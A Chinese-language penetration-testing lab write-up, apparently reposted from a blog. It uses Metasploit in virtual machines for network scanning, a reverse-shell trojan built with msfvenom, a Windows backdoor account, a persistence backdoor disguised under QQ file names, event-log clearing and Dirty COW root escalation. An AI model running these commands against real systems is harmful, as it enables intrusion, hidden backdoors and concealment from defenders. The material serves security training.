1.實驗 Metasploit
2、實驗環境
本實驗需準備:
- Kali虛擬機
2)Windows虛擬機
3)Centos/Ubuntu虛擬機
3、實驗需求
1)將滲透主機KALI,Windows與Metasploitable2的網卡連接模式設定為NAT模式
Kali:
Windows7:
metasploitable2:
2)使用metaspoit連接postgresql,并使用合適的方法探測內網主機存活,
└─# systemctl start postgresql
msf6 > db_nmap 192.168.230.0/24
msf6 > hosts
3)使用合適的方式探測主機系統和埠
msf6 > db_nmap -sV -O -T4 192.168.128.128-132
4)根據已知資訊滲透內網的Metasploitable2與windows主機
5)使用合適的方式滲透Windows主機,進行提權,創建用戶Yucedu,密碼為huawei@123456并留下持久化后門,
1.生成木馬 && 開啟監聽
─# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.230.132 lport=5555 -f exe >wshell.exe 復制到瀏覽器目錄
2.systemctl status apache2
3.window7訪問kali ip地址并下載wshell.exe
4.設定監聽模塊
5.提權:
6.創建用戶
meterpreter > shell
C:\Windows\system32>chcp 65001
C:\Windows\system32>net user Yucedu huawei@123456 /add
在這里插入圖片描述
7.留下可持續化后門
msf6 exploit(multi/handler) > use exploit/windows/local/persistence
msf6 exploit(windows/local/persistence) > set delay 5
msf6 exploit(windows/local/persistence) > set session 1
msf6 exploit(windows/local/persistence) > set VBS_NAME QQ.vbs
msf6 exploit(windows/local/persistence) > set REG_NAME QQ_GAME.reg
msf6 exploit(windows/local/persistence) > set lport 6666
msf6 exploit(windows/local/persistence) > run -j
8.查看window 7 注冊表&& 生成的檔案和任務管理
結束行程session 變成7
9.msf6 > handler -H 192.168.230.132 -P 6666 -p windows/meterpreter/reverse_tcp
#持久化監聽
重啟系統可過了5s看到又反彈了一個shell
6)清除windows滲透痕跡,根據Metasploitable2開放的埠和當前版本,進行資訊搜集,
meterpreter > clearev
Metasploitable2:
msf6 > db_nmap -sV -O -T4 192.168.128.131
7)使用臟牛漏洞攻擊主機Metasploitable2,并留下后門,
利用代碼網址:https://github.com/FireFart/dirtycow/edit/master/dirty.c
1.復制網址的利用代碼到kali 創建dirty.c 檔案
靶機通過訪問kali的http服務下載下來
2.編譯成dirty
3.賦予可執行權限,密碼為123
4.登入firefart 賬號查看(就是root用戶)
5.最后將其恢復:mv /tmp/passwd.bak /etc/passwd
8)將KALI的網卡切換的橋接模式,將手機與物理機連接到同一個WIFI中,使其屬于同一網段,
9)使用合適的方式制作木馬,下放給安卓系統手機并進行連接,
10)使用合適的命令和工具定位手機位置,
因為手機原因無法完成這個實驗
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/375184.html
標籤:其他